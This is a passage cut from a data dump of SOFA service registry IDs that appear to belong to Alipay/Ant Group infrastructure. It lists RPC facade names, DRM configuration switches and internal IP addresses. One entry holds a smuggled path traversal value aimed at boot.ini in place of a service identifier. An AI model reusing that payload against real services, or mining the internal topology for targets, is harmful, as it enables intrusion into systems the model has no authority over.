ck:1.0:bkdepmng_systemParamEditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:invalidSignContractHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.anna.facade.XflushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:operator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.UserEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.sites.facade.service.RegionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finormweb.service.facade.RiskEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.MerchantOperatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthPreEwcVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_csplatform_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.genericmerchant.facade.BatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmservicehub.common.service.facade.csi.CsiTaskMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.account.CfpStandardFundFreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.DsdbCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.regularproduct.api.RegularProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.SubmitLoanApply.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.msgmock.MsgBrokerListenerMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilepolaris@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbrecruit.common.service.facade.recruit.RecruitInviteManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.specification.OperationLogService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_HEALTH_CHECK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.TaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofaboot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_ADAME#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.SchrodersInvestorIQFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.cluster.ClusterInitialFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchprod.globalsite.facade.api.CommonDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcshield.common.service.facade.sysconfig.SysConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.productpkg.IndexQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.AccountQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intl.idataops.ding.DingTalkClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.common.GroupRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.64.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.admin.PartnerAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:baitiaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.space.traffic.ResourceTrafficApi:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.NotifyCheckResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.fieldreport.ReportGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.UserLabelOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.pointcore.facade.api.template.TemplateCopyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fundselling.share.query.RefundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.invokeSumTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.app.AppRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.moneyfund.trade.manage.ProfitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fundscenebff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmng.common.service.FunctionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:updatePoseExceptionExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.ScriptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.SaAccountBindingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.payDecisionSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:kbMerchantManageQueryDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessRejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.merchant.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alipayrel.api.AlipayRelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.dpSwitchWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.integration.einvoice.EinvoiceApplyServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.experiment.ExperimentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:darwin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcheck.biz.service.impl.test.SoapUITest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.redeem.FundRedeemSwitchDrm:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.newcache.client.api.ParmDataQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:framodelDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_AML#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcbmarketcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.bank.api.BankDateCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.lifenotify.LifeNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuProcessRecordRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancommon.common.service.facade.arrealm.authar.api.AuthArSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.logLevelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_review2BeforeProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.slipProBizOffType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PermissionActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mydds@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.analysis.AnalysisCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_LINKS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.core.service.yeb.manager.MinitransModifyManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.allowedBizErrStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.signStatusSleepTimeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.alphaq.common.facade.label.api.IRefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agdsroalipay.facade.configtable.ConfigTableDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.128.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_SMARTSCENE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.ContentManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransAsyncTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.ActivityShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_FINFOSERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mquery.common.service.facade.report.ForexPreAuthOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilecommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.EscrowAccountEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ecmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finasmcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.nightswatch.common.facade.alert.command.AlertOperateService:1.0:dpnightswatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.SortRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileAssembleCallBack:1.0:instbill@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.relatedreading.api.RelatedReadingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.224.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.49.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insautobff:name=com.alipay.chair.businessgray.drm.renderGray.renderOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.core.service.ruleEntrance.service.ConfigMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointExpireDrmResouce.pointExpireRecoverNumControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.inner.facade.api.SubTemplateInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.hyp.QueryTairValueByKeyForHYPFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.methodDataPointName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omp.common.service.facade.api.BatchFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.service.ProdtransAsynRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.mulinst.FundThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.frame.FrameCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettleSupplementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouStandardBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@psbp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.authcenter.service.facade.OauthServiceArrangeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADATABUS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcenter.common.service.facade.drill.service.AdcFaultSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.shopminiapp.facade.api.upgrade.ShopUpgradeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.TempOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.settlequery.common.service.facade.config.api.ApiRemoteRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.aircoreservice.core.businessservice.api.TradeBusinessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveFollowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.SpiConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmcamnggray@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.guess.BackstageGuessRoundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:finreconchecker_finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.ZcbTradeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.statPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ALIDEVICEINFO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.MerchantUserService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FILECORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finmodelops.common.service.facade.api.FinModelOpsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_uctlab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zdatabusDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../../../../../../../boot.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.isv.SignupActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CampTriggerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaTemplateRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransPaycoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.scene.api.SceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.ArSynchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:transfercenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.contentfusionConfigDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.179.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:finaggexpbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.SmartContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.micloan.agdslibra.facade.service.PersonRiskCenterInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.IndirectMerchantDRM.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@mobiledc#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.162.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:minitrans_hvtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.AutoInsightConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloud.common.service.integration.mic.prod.lisa.drm.LisaUsableConfigDrm.usableMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.xtsRefundEventLoadMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbpdcenter.common.service.facade.ProdSwitchPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.monitor.ModelMonitorInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HbProductOrderToolsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DATAKEEPER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.antplatform.api.DemandManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.contract.AcContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_INNERTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.service.facade.detect.EcoSysConfigInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.refreshCampRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.24.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseaprod.common.service.tuition.tr.TuitionOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaZoneRuleApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.baopoint.api.BpdtransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.receipt.ClerkReceiptGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FinSceneTriggerDrm.richManTableCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskxm.sdk.appmessage.facade.RemoteSubscriberAppMessageObserverFacade:1.0:remote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroup.AppInstanceGroupStatisticFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_LINYA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csrobot.service.facade.mng.api.MiningTaskMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@promorulemng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:preSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepmgw.common.service.facade.troop.SyncPreTroopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.profile.MiniAppProfileOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.openapi.CommonOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paylink.service.facade.ProdTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanApplyCmd.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocore.common.service.facade.SNSManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransSpecialFreezeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.73.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROU